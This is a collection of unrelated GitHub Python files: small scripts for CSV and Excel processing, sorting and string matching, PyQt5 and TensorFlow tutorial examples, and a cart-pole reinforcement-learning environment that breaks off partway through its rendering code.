{"seq_id":"28321680057","text":"import csv\n\n\ndef refine_label():\n\trows = []\n\twith open('processed_0_prepare.csv', 'r') as f:\n\t\treader = csv.reader(f)\n\t\ti = -1\n\t\tfor row in reader:\n\t\t\ti += 1\n\t\t\tif i == 0:\n\t\t\t\trows.append(row)\n\t\t\t\tcontinue\n\t\t\tif row[1] == '62':\n\t\t\t\trow[1] = 0\n\t\t\telif row[1] == '42':\n\t\t\t\trow[1] = 1\n\t\t\telif row[1] == '55':\n\t\t\t\trow[1] = 2\n\t\t\telif row[1] == '63':\n\t\t\t\trow[1] = 3\n\t\t\telif row[1] == '71':\n\t\t\t\trow[1] = 4\n\t\t\trows.append(row)\n\t\n\twith open('processed_0.csv', 'w') as f_write:\n\t\tcsv_writer = csv.writer(f_write)\n\t\tfor row in rows:\n\t\t\tcsv_writer.writerow(row)\n\nif __name__ == 
\"__main__\":\n\tprocess()","repo_name":"SOCR/DataSifter","sub_path":"example/refine_label.py","file_name":"refine_label.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"66"} +{"seq_id":"20840617970","text":"import openpyxl\n\nfile = openpyxl.load_workbook(\"Book1.xlsx\")\n\nproduct_list = file[\"Sheet1\"]\n\n# here we are making dictionaries for total value and product per supplier\nproducts_per_supplier = {}\ntotal_value_per_supplier = {}\nproducts_less_100 = {}\n\n# here we are iterate excel file rows one by one using for loop\nfor product_row in range(2, product_list.max_row+1):\n supplier_name = product_list.cell(product_row, 4).value\n price = product_list.cell(product_row, 3).value\n inventory = product_list.cell(product_row, 2).value\n prod_num = product_list.cell(product_row, 1).value\n inventory_price = product_list.cell(product_row, 5)\n\n if supplier_name in products_per_supplier:\n curr_num_products = products_per_supplier.get(supplier_name)\n products_per_supplier[supplier_name] = curr_num_products+1\n else:\n print(\"new added\")\n products_per_supplier[supplier_name] = 1\n\n # calculation total value inventory per supplier\n if supplier_name in total_value_per_supplier:\n curr_supplier_value = total_value_per_supplier.get(supplier_name)\n total_value_per_supplier[supplier_name] = curr_supplier_value + (inventory * price)\n else:\n total_value_per_supplier[supplier_name] = inventory * price\n\n # to find inventory product number which have less than 100\n if inventory < 100:\n products_less_100[prod_num] = inventory\n\n # to add multiplication of inventory and price in excel sheet\n\n inventory_price.value = inventory * price\n\n\nprint(products_per_supplier)\nprint(total_value_per_supplier)\nprint(products_less_100)\n\n\nfile.save(\"Sheet2.xlsx\")\n\nprint(\"EOP\")\n","repo_name":"ArpitVadariya/PythonD","sub_path":"Automation/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"8876307590","text":"import matplotlib.pyplot as plt\nfrom dotenv import load_dotenv\nimport os\nimport numpy as np\n\nimport rfinder.data.converter as dc\nimport rfinder.plot.utils as pu\nfrom rfinder.config import Config\nfrom rfinder.plot.sigmf_utils import full_sigmf_ax\n\nload_dotenv() # take environment variables from .env.\n\ninput_dir = os.getenv('TRAIN_DIR')+'/'\nconfig = Config()\n\n# filename = 'west-wideband-modrec-ex1-tmpl2-20.04.sigmf-meta'\n# filename = 'west-wideband-modrec-ex69-tmpl10-20.04.sigmf-meta'\nfilename='west-wideband-modrec-ex6-tmpl13-20.04.sigmf-meta'\n\n\nNFFT=1024\nimg_w = 512\nimg_h = 512\n\nimgs, labels = dc.sigmf_to_labelled_images(input_dir+filename, NFFT=NFFT, noverlap=NFFT//2, img_w=img_w, img_h=img_h)\n\nimgs_maxs = [np.max(img) for img in imgs]\nvmax = max(imgs_maxs)\nimgs_mins = [np.min(img) for img in imgs]\nvmin = min(imgs_mins)\n\nimg_label_iter = zip(imgs, labels)\ncolor = config.plotting.color['label']\n\ntry:\n while True:\n fig, axs = plt.subplots(NFFT//img_w, NFFT//img_h)\n for ax in axs.reshape(-1):\n img, label = next(img_label_iter)\n pu.single_img_ax(ax=ax, img=img, vrange=(vmin,vmax))\n pu.add_center_dot_patch(ax, label, color)\n pu.add_rect_patch(ax, label, color) \n\n plt.show()\n \n\nexcept StopIteration:\n print(\"done all 
images\")","repo_name":"nsbruce/spawc21-bounding-boxes","sub_path":"plot_split.py","file_name":"plot_split.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"34193194311","text":"def factorial(x):\n \"\"\"Find x!.\"\"\"\n if isinstance(x, float):\n fl = int(x)\n if fl != x:\n raise ValueError(\"float arguments must be integral\")\n x = fl\n if x < 0:\n raise ValueError(\"x must be >= 0\")\n res = 1\n for i in range(1, x + 1):\n res *= i\n return res\n","repo_name":"diffoperator/Sypy","sub_path":"module/math/app_math.py","file_name":"app_math.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"66"} +{"seq_id":"33810746251","text":"# -*- coding: utf-8 -*-\r\n'''\r\nCreated on 1983. 08. 09.\r\n@author: Hye-Churn Jang, CMBU Specialist in Korea, VMware [jangh@vmware.com]\r\n'''\r\n\r\nname = 'Deployment' # custom resource name\r\n\r\nsdk = 'vra' # imported SDK at common directory\r\n\r\ninputs = {\r\n 'create': {\r\n 'VraManager': 'constant'\r\n },\r\n 'read': {\r\n },\r\n 'update': {\r\n 'VraManager': 'constant'\r\n },\r\n 'delete': {\r\n 'VraManager': 'constant'\r\n }\r\n}\r\n\r\nproperties = {\r\n 'name': {\r\n 'type': 'string',\r\n 'title': 'Name',\r\n 'recreateOnUpdate': True,\r\n 'description': 'Unique name of deployment'\r\n },\r\n 'projectName': {\r\n 'type': 'string',\r\n 'title': 'Project',\r\n 'recreateOnUpdate': True,\r\n 'description': 'Assigned project' \r\n },\r\n 'itemType': {\r\n 'type': 'string',\r\n 'title': 'Contents Type',\r\n 'enum': [\r\n 'blueprint',\r\n 'catalog'\r\n ],\r\n 'recreateOnUpdate': True,\r\n 'description': 'Contents from blueprint or catalog'\r\n },\r\n 'itemName': {\r\n 'type': 'string',\r\n 'title': 'Contents',\r\n 'recreateOnUpdate': True,\r\n 'description': 'Contents name to deploy'\r\n },\r\n 'inputs': {\r\n 'type': 'object',\r\n 'title': 'Inputs',\r\n 'default': {},\r\n 'description': 'Inputs parameters to deploy'\r\n }\r\n}","repo_name":"HyechurnJang/vRealize","sub_path":"devs/abx/custom_resource/resources/deployment/manifest.py","file_name":"manifest.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"66"} +{"seq_id":"27121122401","text":"\"\"\"\r\nPyQt5 tutorial\r\nThis example shows a QSlider widget.\r\n\"\"\"\r\n\r\nimport sys\r\nfrom PyQt5.QtWidgets import QWidget, QSlider, QLabel, QApplication\r\nfrom PyQt5.QtGui import QPixmap\r\nfrom PyQt5.QtCore import Qt\r\n\r\n\r\n# QSlider是一个带有简单滑块的控件。滑块可以前后拖动。\r\n# 我们可以通过拖动选择一个特定的值。有时使用滑动条比\r\n# 直接输入数字或使用旋转框更加自然。\r\nclass Example(QWidget):\r\n def __init__(self):\r\n super(Example, self).__init__()\r\n self.initUI()\r\n\r\n def initUI(self):\r\n sld = QSlider(Qt.Horizontal, self)\r\n sld.setFocusPolicy(Qt.NoFocus)\r\n sld.setGeometry(30, 40, 100, 30)\r\n sld.valueChanged[int].connect(self.changeValue)\r\n\r\n self.lable = QLabel(self)\r\n self.lable.setPixmap(QPixmap(\"../ICON/add.png\"))\r\n self.lable.setGeometry(160, 40, 80, 30)\r\n\r\n self.setGeometry(300, 300, 280, 170)\r\n self.setWindowTitle('Toggle dialog')\r\n self.show()\r\n\r\n # 根据滑动条的值来设置标签的图像。\r\n def changeValue(self, value):\r\n if value == 0:\r\n self.lable.setPixmap(QPixmap(\"../ICON/back.png\"))\r\n elif 0 < value <= 30:\r\n self.lable.setPixmap(QPixmap(\"../ICON/bottom.png\"))\r\n elif 30 < value < 80:\r\n 
self.lable.setPixmap(QPixmap(\"../ICON/call-start.png\"))\r\n        else:\r\n            self.lable.setPixmap(QPixmap(\"../ICON/call-stop.png\"))\r\n\r\n\r\nif __name__ == '__main__':\r\n    app = QApplication(sys.argv)\r\n    ex = Example()\r\n    sys.exit(app.exec_())\r\n","repo_name":"dlinzhao/PyQt5-Example","sub_path":"chapter_7/pyqt7_3.py","file_name":"pyqt7_3.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"}
{"seq_id":"2907496347","text":"from datetime import date\nfrom dateutil import parser\ntoday = date.today()\nPESEL = str(input(\"Podaj swój numer PESEL: \"))\nprint(PESEL[0:6])\n\n# calculate the age (assumes a 19xx birth year)\nrok_urodzenia = int(\"19\" + PESEL[0:2])\ndata_urodzenia = (\"19\" + PESEL[0:2] + \"-\" + PESEL[2:4] + \"-\" + PESEL[4:6])\n# parser.parse returns a datetime; take .date() so it can be subtracted from today's date\nx = parser.parse(data_urodzenia).date()\nprint(x)\nwiek = today - x\nprint(today)\nprint(wiek)","repo_name":"GlinkaG/pp1","sub_path":"02-ControlStructures/Zad34(proba).py","file_name":"Zad34(proba).py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"pl","doc_type":"code","dataset":"github-code","pt":"68"}
{"seq_id":"42369941666","text":"# Sorting\n\ndef bubble(items):\n    for i in range(len(items)):\n        for j in range(len(items)-i-1):\n\n            if items[j] > items[j+1]: items[j],items[j+1]=items[j+1],items[j]\n\ndef sort(items):\n    # merge sort needs a base case, an integer midpoint and must return its result\n    if len(items) <= 1:\n        return items\n    mid = len(items)//2\n    left = sort(items[:mid])\n    right = sort(items[mid:])\n    return join(left, right)\n\n\n\ndef join(left, right):\n    # merge two sorted lists into one sorted list\n    joined = []\n    i = j = 0\n    while i < len(left) and j < len(right):\n        if left[i] < right[j]:\n            joined.append(left[i])\n            i += 1\n        else:\n            joined.append(right[j])\n            j += 1\n    # append whatever remains of the longer list\n    joined += left[i:]\n    joined += right[j:]\n    return joined\n\n\nitems=[6,2,1,7,0,-10]\nbubble(items)\nprint(items)\n\n","repo_name":"ShiveeUSF/MyProjects","sub_path":"Problem_Solving/p5.py","file_name":"p5.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"}
{"seq_id":"28153315746","text":"import unittest\n\nclass Solution:\n    def naive_matching(self,t, p):\n        m, n = len(p), len(t)\n        i = j = 0\n        while i < n and j < m:\n            if t[i] == p[j]:\n                i, j = i + 1, j + 1\n            else:\n                j, i = 0, i - j + 1\n        if j >= m:\n            return n - i\n        else:\n            return -1\n\n\n    def naive_matching2(self, t, p):\n        \"\"\"\n        Slide a window of the pattern's length across the text; when the slice equals the pattern, that offset is a match.\n        \"\"\"\n        len_p = len(p)\n        last_index = len(t) - len(p)\n\n        if last_index < 0:\n            return -1\n\n        # last_index itself is a valid start position, so the range must include it\n        for i in range(last_index + 1):\n            if t[i:len_p+i] == p:\n                return i\n\n        return -1\n\n\n\nclass TestSolution(unittest.TestCase):\n    def setUp(self):\n        self.solution = Solution()\n    \n\n    def test_naive_matching(self):\n        t = 'ababab'\n        p = 'ba'\n        result = self.solution.naive_matching(t, p)\n        self.assertEqual(3, result)\n\n    def test_naive_matching2(self):\n        t = 'aaabbbccc'\n        p = 'a'\n        result = self.solution.naive_matching2(t, p)\n        self.assertEqual(0, result)\n\nif __name__ == \"__main__\":\n    unittest.main()\n","repo_name":"someonehan/Algorithms","sub_path":"src/DataStructure/stringd/matching.py","file_name":"matching.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"}
{"seq_id":"73651653655","text":"import tensorflow as tf\n\n# 设置GPU按需增长\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth = True\nsess = tf.Session(config=config)\n\n\n# 下面是定义一个卷积层的通用方式\ndef conv_relu(kernel_shape, bias_shape):\n    # Create variable named \"weights\".\n    weights = tf.get_variable(\"weights\", kernel_shape, initializer=tf.random_normal_initializer())\n    # Create variable 
named \"biases\".\n biases = tf.get_variable(\"biases\", bias_shape, initializer=tf.constant_initializer(0.0))\n return None\n\n\ndef my_image_filter():\n # 按照下面的方式定义卷积层,非常直观,而且富有层次感\n with tf.variable_scope(\"conv1\"):\n # Variables created here will be named \"conv1/weights\", \"conv1/biases\".\n relu1 = conv_relu([5, 5, 32, 32], [32])\n with tf.variable_scope(\"conv2\"):\n # Variables created here will be named \"conv2/weights\", \"conv2/biases\".\n return conv_relu([5, 5, 32, 32], [32])\n\n\nwith tf.variable_scope(\"image_filters\") as scope:\n # 下面我们两次调用 my_image_filter 函数,但是由于引入了 变量共享机制\n # 可以看到我们只是创建了一遍网络结构。\n result1 = my_image_filter()\n scope.reuse_variables()\n result2 = my_image_filter()\n\n# 看看下面,完美地实现了变量共享!!!\nvs = tf.trainable_variables()\nprint('There are %d train_able_variables in the Graph: ' % len(vs))\nfor v in vs:\n print(v)\n","repo_name":"lvjianjunljj/deep_learning_study","sub_path":"tensorflow_study/getting_started/g_name_variable_scope/experiment_2_2.py","file_name":"experiment_2_2.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"22761165087","text":"import os\n\nimport numpy\nfrom arq import ARQ as SimulationModule\nfrom arq import Configuration as Conf\n\n\ndef main():\n turns, file_name, message_length = Conf.configure_simulation()\n\n print(\"\\nRozpoczynam symulacje...\")\n arq_system = SimulationModule.ARQ()\n for i in range(0, turns):\n\n if i % (turns*0.05) == 0:\n print(str(i/(turns*0.05)*5)+\"%\\t(\"+str(i)+\"/\"+str(turns)+\")\")\n\n arq_system.simulate_transmission(message_length)\n arq_system.save_results(file_name)\n\n os.system('cls')\n print(\"Zapisano\", turns, \"wyników do\", file_name+\".csv\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"walig-here/niduc-projekt","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"74218919256","text":"\"\"\"\r\nClassic cart-pole system implemented by Rich Sutton et al.\r\nCopied from http://incompleteideas.net/sutton/book/code/pole.c\r\npermalink: https://perma.cc/C9ZM-652R\r\n\"\"\"\r\n\r\nimport math\r\nimport gym\r\nfrom gym import spaces, logger\r\nfrom gym.utils import seeding\r\nimport numpy as np\r\n\r\n\r\nclass CartPoleEnvContiReward(gym.Env):\r\n \"\"\"\r\n Description:\r\n A pole is attached by an un-actuated joint to a cart, which moves along\r\n a frictionless track. The pendulum starts upright, and the goal is to\r\n prevent it from falling over by increasing and reducing the cart's\r\n velocity.\r\n\r\n Source:\r\n This environment corresponds to the version of the cart-pole problem\r\n described by Barto, Sutton, and Anderson\r\n\r\n Observation:\r\n Type: Box(4)\r\n Num Observation Min Max\r\n 0 Cart Position -4.8 4.8\r\n 1 Cart Velocity -Inf Inf\r\n 2 Pole Angle -0.418 rad (-24 deg) 0.418 rad (24 deg)\r\n 3 Pole Angular Velocity -Inf Inf\r\n\r\n Actions:\r\n Type: Discrete(2)\r\n Num Action\r\n 0 Push cart to the left\r\n 1 Push cart to the right\r\n\r\n Note: The amount the velocity that is reduced or increased is not\r\n fixed; it depends on the angle the pole is pointing. 
This is because\r\n the center of gravity of the pole increases the amount of energy needed\r\n to move the cart underneath it\r\n\r\n Reward:\r\n Reward is cos(x*pi/(2L))² for every step taken, -100 for the termination step\r\n\r\n Starting State:\r\n All observations are assigned a uniform random value in [-0.05..0.05]\r\n\r\n Episode Termination:\r\n Pole Angle is more than 12 degrees.\r\n Cart Position is more than 2.4 (center of the cart reaches the edge of\r\n the display).\r\n Episode length is greater than 200.\r\n Solved Requirements:\r\n Considered solved when the average return is greater than or equal to\r\n 195.0 over 100 consecutive trials.\r\n \"\"\"\r\n\r\n metadata = {\r\n 'render.modes': ['human', 'rgb_array'],\r\n 'video.frames_per_second': 50\r\n }\r\n\r\n def __init__(self, cyclic_boundary=False, auto_reset=True,\r\n show_arrows=True):\r\n \"\"\"\r\n cyclic_boundary -- If true, hitting a wall on one side teleport the\r\n cart to the other side.\r\n auto_reset -- If true, the environment automatically reset if the cart\r\n hit a wall of the pole fall, without\r\n causing termination.\r\n show_arrows -- plot arrow showing angular and linear velocity in the\r\n render.\r\n \"\"\"\r\n self.cyclic_boundary = cyclic_boundary\r\n self.show_arrows = show_arrows\r\n self.gravity = 9.8\r\n self.masscart = 1.0\r\n self.masspole = 0.1\r\n self.total_mass = (self.masspole + self.masscart)\r\n self.length = 0.5 # actually half the pole's length\r\n self.polemass_length = (self.masspole * self.length)\r\n self.force_mag = 10.0\r\n self.tau = 0.02 # seconds between state updates\r\n self.kinematics_integrator = 'euler'\r\n self.auto_reset = auto_reset\r\n\r\n\r\n\r\n # Angle at which to fail the episode\r\n self.theta_threshold_radians = 12 * 2 * math.pi / 360\r\n self.x_threshold = 2.4\r\n\r\n self._max_episode_steps = 10000\r\n\r\n # Angle limit set to 2 * theta_threshold_radians so failing observation\r\n # is still within bounds.\r\n high = np.array([self.x_threshold * 2,\r\n np.finfo(np.float32).max,\r\n self.theta_threshold_radians * 2,\r\n np.finfo(np.float32).max],\r\n dtype=np.float32)\r\n\r\n self.action_space = spaces.Discrete(2)\r\n self.observation_space = spaces.Box(-high, high, dtype=np.float32)\r\n\r\n self.seed()\r\n self.viewer = None\r\n self.state = None\r\n\r\n self.steps_beyond_done = None\r\n self.step_nb = 0\r\n self.reset()\r\n\r\n def seed(self, seed=None):\r\n self.np_random, seed = seeding.np_random(seed)\r\n return [seed]\r\n\r\n def step(self, action):\r\n err_msg = \"%r (%s) invalid\" % (action, type(action))\r\n assert self.action_space.contains(action), err_msg\r\n self.step_nb +=1\r\n\r\n\r\n x, x_dot, theta, theta_dot = self.state\r\n force = self.force_mag if action == 1 else -self.force_mag\r\n costheta = math.cos(theta)\r\n sintheta = math.sin(theta)\r\n\r\n # For the interested reader:\r\n # https://coneural.org/florian/papers/05_cart_pole.pdf\r\n temp = (force + self.polemass_length * theta_dot ** 2 * sintheta) / self.total_mass\r\n thetaacc = (self.gravity * sintheta - costheta * temp) / (self.length * (4.0 / 3.0 - self.masspole * costheta ** 2 / self.total_mass))\r\n xacc = temp - self.polemass_length * thetaacc * costheta / self.total_mass\r\n\r\n if self.kinematics_integrator == 'euler':\r\n x = x + self.tau * x_dot\r\n x_dot = x_dot + self.tau * xacc\r\n theta = theta + self.tau * theta_dot\r\n theta_dot = theta_dot + self.tau * thetaacc\r\n else: # semi-implicit euler\r\n x_dot = x_dot + self.tau * xacc\r\n x = x + self.tau * x_dot\r\n 
            theta_dot = theta_dot + self.tau * thetaacc\r\n            theta = theta + self.tau * theta_dot\r\n\r\n        if self.cyclic_boundary:\r\n            if x > self.x_threshold:\r\n                x = -self.x_threshold + 0.1\r\n\r\n            if x < -self.x_threshold:\r\n                x = self.x_threshold - 0.1\r\n\r\n        self.state = (x, x_dot, theta, theta_dot)\r\n\r\n        done = bool(\r\n            x < -self.x_threshold\r\n            or x > self.x_threshold\r\n            or theta < -self.theta_threshold_radians\r\n            or theta > self.theta_threshold_radians\r\n            or self.step_nb > self._max_episode_steps\r\n        )\r\n\r\n        if done and self.auto_reset:\r\n            self.reset()\r\n            done = False\r\n\r\n        reward = 0.0\r\n        if not done:\r\n            reward = 1.0\r\n        if self.steps_beyond_done is None and done:\r\n            # Pole just fell!\r\n            self.steps_beyond_done = 0\r\n            reward = 1.0\r\n        else:\r\n            if self.steps_beyond_done == 0:\r\n                logger.warn(\r\n                    \"You are calling 'step()' even though this \"\r\n                    \"environment has already returned done = True. You \"\r\n                    \"should always call 'reset()' once you receive 'done = \"\r\n                    \"True' -- any further steps are undefined behavior.\"\r\n                )\r\n            self.steps_beyond_done += 1\r\n            reward = 0.0\r\n\r\n        # reward_theta = (np.cos(theta)+1.0)/2.0\r\n        # reward_x = np.cos((x/self.x_threshold)*(np.pi/2))\r\n        #\r\n        # reward = reward_theta*reward_x\r\n        # the branches above only maintain the steps_beyond_done bookkeeping;\r\n        # the reward actually returned is the positional cosine below\r\n        reward = np.cos((x/self.x_threshold)*(np.pi/2))**2\r\n\r\n        return np.array(self.state), reward, done, {}\r\n\r\n    def reset(self):\r\n        self.step_nb = 0\r\n        self.state = self.np_random.uniform(low=-0.05, high=0.05, size=(4,))\r\n        self.steps_beyond_done = None\r\n        return np.array(self.state)\r\n\r\n    def set_state(self, new_state, pole_len=None):\r\n        self.steps_beyond_done = None  # was a bare no-op statement; clearing the flag is the apparent intent\r\n        self.state = new_state\r\n\r\n        if pole_len is not None:\r\n            self.length = pole_len # actually half the pole's length\r\n            self.polemass_length = (self.masspole * self.length)\r\n\r\n\r\n    def render(self, mode='human'):\r\n        screen_width = 600\r\n        screen_height = 400\r\n\r\n        world_width = self.x_threshold * 2\r\n        scale = screen_width/world_width\r\n        carty = 100 # TOP OF CART\r\n        polewidth = 10.0\r\n        polelen = scale * (2 * self.length)\r\n        cartwidth = 50.0\r\n        cartheight = 30.0\r\n\r\n        #Arrow render param\r\n\r\n        pad = 7.0\r\n        self.vel_arrow_len = 0\r\n        arrowwidth = 10.0\r\n        tipwidth = 20.0\r\n\r\n        self.theta = 0\r\n\r\n        # action taken\r\n\r\n        pad_act = 200\r\n\r\n\r\n        if self.viewer is None:\r\n            from gym.envs.classic_control import rendering\r\n            self.viewer = rendering.Viewer(screen_width, screen_height)\r\n            l, r, t, b = -cartwidth / 2, cartwidth / 2, cartheight / 2, -cartheight / 2\r\n            axleoffset = cartheight / 4.0\r\n\r\n            self.track = rendering.Line((0, carty), (screen_width, carty))\r\n            self.track.set_color(0, 0, 0)\r\n            self.viewer.add_geom(self.track)\r\n\r\n            cart = rendering.FilledPolygon([(l, b), (l, t), (r, t), (r, b)])\r\n            cart.set_color(0.0, 0.0, 0.0)\r\n            self.carttrans = rendering.Transform()\r\n            cart.add_attr(self.carttrans)\r\n            self.viewer.add_geom(cart)\r\n            self.cart = cart\r\n            l, r, t, b = -polewidth / 2, polewidth / 2, polelen - polewidth / 2, -polewidth / 2\r\n            pole = rendering.FilledPolygon([(l, b), (l, t), (r, t), (r, b)])\r\n            pole.set_color(.8, .6, .4)\r\n            self.poletrans = rendering.Transform(translation=(0, axleoffset))\r\n            pole.add_attr(self.poletrans)\r\n            pole.add_attr(self.carttrans)\r\n            self.viewer.add_geom(pole)\r\n\r\n\r\n\r\n            if self.show_arrows:\r\n                #linear velocity arrow\r\n                l, r, t, b = cartwidth + pad, cartwidth + pad+ self.vel_arrow_len, arrowwidth/2, -arrowwidth/2\r\n\r\n                lin_arrow_body = rendering.FilledPolygon([(l, b), (l, t), (r, t), (r, b)])\r\n
                lin_arrow_body.set_color(0.7, 0.7, 0.7)\r\n                lin_arrow_body.add_attr(self.carttrans)\r\n\r\n                self.lin_arrow_body =lin_arrow_body\r\n\r\n                self.viewer.add_geom(lin_arrow_body)\r\n\r\n                t,b, tip = tipwidth/2, -tipwidth/2, np.sqrt(3)*tipwidth/2\r\n\r\n                lin_arrow_tip = rendering.FilledPolygon([(r, t), (r+tip, 0), (r, b)])\r\n                lin_arrow_tip.set_color(0.7, 0.7, 0.7)\r\n                lin_arrow_tip.add_attr(self.carttrans)\r\n                self.lin_arrow_tip = lin_arrow_tip\r\n                self.viewer.add_geom(lin_arrow_tip)\r\n\r\n                #angular velocity arrow body\r\n                ang_arrow_len = 0\r\n                theta = 0\r\n\r\n                od = (np.cos(theta), -np.sin(theta) ) #direction orthogonal to the pole\r\n                pd = (np.sin(theta), np.cos(theta) ) #pole direction\r\n                L = polelen - polewidth / 2\r\n                pt = (L*np.sin(theta), L*np.cos(theta)) #pole tip\r\n\r\n                ang_arrow_body = rendering.FilledPolygon([(pt[0]+pad*od[0]+(arrowwidth/2)*pd[0],\r\n                                                           pt[1]+pad*od[1]+(arrowwidth/2)*pd[1]),\r\n                                                          (pt[0]+(pad+ang_arrow_len)*od[0]+(arrowwidth/2)*pd[0],\r\n                                                           pt[1]+(pad+ang_arrow_len)*od[1]+(arrowwidth/2)*pd[1]),\r\n                                                          (pt[0]+(pad+ang_arrow_len)*od[0]-(arrowwidth/2)*pd[0],\r\n                                                           pt[1]+(pad+ang_arrow_len)*od[1]-(arrowwidth/2)*pd[1]),\r\n                                                          (pt[0]+pad*od[0]-(arrowwidth/2)*pd[0],\r\n                                                           pt[1]+pad*od[1]-(arrowwidth/2)*pd[1])])\r\n                ang_arrow_body.set_color(0.7, 0.7, 0.7)\r\n                ang_arrow_body.add_attr(self.carttrans)\r\n                self.ang_arrow_body =ang_arrow_body\r\n                self.viewer.add_geom(ang_arrow_body)\r\n\r\n                #angular velocity arrow tip\r\n                ang_arrow_tip = rendering.FilledPolygon([(pt[0]+(pad+ang_arrow_len)*od[0]+(tipwidth/2)*pd[0],\r\n                                                          pt[1]+(pad+ang_arrow_len)*od[1]+(tipwidth/2)*pd[1]),\r\n                                                         (pt[0]+(pad+ang_arrow_len)*od[0]-(tipwidth/2)*pd[0],\r\n                                                          pt[1]+(pad+ang_arrow_len)*od[1]-(tipwidth/2)*pd[1]),\r\n                                                         (pt[0]+(pad+ang_arrow_len+np.sqrt(3)*tipwidth/2)*od[0],\r\n                                                          pt[1]+(pad+ang_arrow_len+np.sqrt(3)*tipwidth/2)*od[1])])\r\n                ang_arrow_tip.set_color(0.7, 0.7, 0.7)\r\n                ang_arrow_tip.add_attr(self.carttrans)\r\n                self.ang_arrow_tip = ang_arrow_tip\r\n                self.viewer.add_geom(ang_arrow_tip)\r\n\r\n            #rest of the environment\r\n            self.axle = rendering.make_circle(polewidth/2)\r\n            self.axle.add_attr(self.poletrans)\r\n            self.axle.add_attr(self.carttrans)\r\n            self.axle.set_color(.5, .5, .8)\r\n            self.viewer.add_geom(self.axle)\r\n\r\n\r\n            self._pole_geom = pole\r\n\r\n        if self.state is None:\r\n            return None\r\n\r\n        x = self.state\r\n\r\n        #Edit the arrow geometry\r\n        if self.show_arrows:\r\n            #linear velocity arrow\r\n            self.vel_arrow_len = abs(x[1]*40.0)\r\n            #side = int(self.vel_arrow_len >0)\r\n\r\n            if x[1]>0:\r\n                l, r, t, b = cartwidth/2 + pad, cartwidth/2 + pad+ self.vel_arrow_len, arrowwidth/2, -arrowwidth/2\r\n                tip_top,tip_bot, tip_end = tipwidth/2, -tipwidth/2, np.sqrt(3)*tipwidth/2\r\n                self.lin_arrow_tip.v = [(r, tip_top), (r+tip_end, 0), (r, tip_bot)]\r\n\r\n            else:\r\n                l,r,t,b = -cartwidth/2 -pad -self.vel_arrow_len, -cartwidth/2 -pad, arrowwidth/2, -arrowwidth/2\r\n                tip_top,tip_bot, tip_end = tipwidth/2, -tipwidth/2, np.sqrt(3)*tipwidth/2\r\n                self.lin_arrow_tip.v = [(l, tip_top), (l-tip_end, 0), (l, tip_bot)]\r\n\r\n            self.lin_arrow_body.v = [(l, b), (l, t), (r, t), (r, b)]\r\n\r\n            #angular velocity arrow\r\n            pad += polewidth/2\r\n            ang_arrow_len = abs(x[3]*40.0)\r\n            theta = x[2]\r\n\r\n            od = (np.cos(theta), -np.sin(theta) ) #direction orthogonal to the pole\r\n            pd = (np.sin(theta), np.cos(theta) ) #pole direction\r\n            L = polelen - polewidth / 2\r\n            pt = (L*np.sin(theta), L*np.cos(theta)) #pole tip\r\n            if x[3] > 0:\r\n                self.ang_arrow_body.v = [(pt[0]+pad*od[0]+(arrowwidth/2)*pd[0],\r\n
                                         pt[1]+pad*od[1]+(arrowwidth/2)*pd[1]),\r\n                                        (pt[0]+(pad+ang_arrow_len)*od[0]+(arrowwidth/2)*pd[0],\r\n                                         pt[1]+(pad+ang_arrow_len)*od[1]+(arrowwidth/2)*pd[1]),\r\n                                        (pt[0]+(pad+ang_arrow_len)*od[0]-(arrowwidth/2)*pd[0],\r\n                                         pt[1]+(pad+ang_arrow_len)*od[1]-(arrowwidth/2)*pd[1]),\r\n                                        (pt[0]+pad*od[0]-(arrowwidth/2)*pd[0],\r\n                                         pt[1]+pad*od[1]-(arrowwidth/2)*pd[1])]\r\n                self.ang_arrow_tip.v = [(pt[0]+(pad+ang_arrow_len)*od[0]+(tipwidth/2)*pd[0],\r\n                                         pt[1]+(pad+ang_arrow_len)*od[1]+(tipwidth/2)*pd[1]),\r\n                                        (pt[0]+(pad+ang_arrow_len)*od[0]-(tipwidth/2)*pd[0],\r\n                                         pt[1]+(pad+ang_arrow_len)*od[1]-(tipwidth/2)*pd[1]),\r\n                                        (pt[0]+(pad+ang_arrow_len+np.sqrt(3)*tipwidth/2)*od[0],\r\n                                         pt[1]+(pad+ang_arrow_len+np.sqrt(3)*tipwidth/2)*od[1])]\r\n            else:\r\n                self.ang_arrow_body.v = [(pt[0]-pad*od[0]+(arrowwidth/2)*pd[0],\r\n                                          pt[1]-pad*od[1]+(arrowwidth/2)*pd[1]),\r\n                                         (pt[0]-(pad+ang_arrow_len)*od[0]+(arrowwidth/2)*pd[0],\r\n                                          pt[1]-(pad+ang_arrow_len)*od[1]+(arrowwidth/2)*pd[1]),\r\n                                         (pt[0]-(pad+ang_arrow_len)*od[0]-(arrowwidth/2)*pd[0],\r\n                                          pt[1]-(pad+ang_arrow_len)*od[1]-(arrowwidth/2)*pd[1]),\r\n                                         (pt[0]-pad*od[0]-(arrowwidth/2)*pd[0],\r\n                                          pt[1]-pad*od[1]-(arrowwidth/2)*pd[1])]\r\n                self.ang_arrow_tip.v = 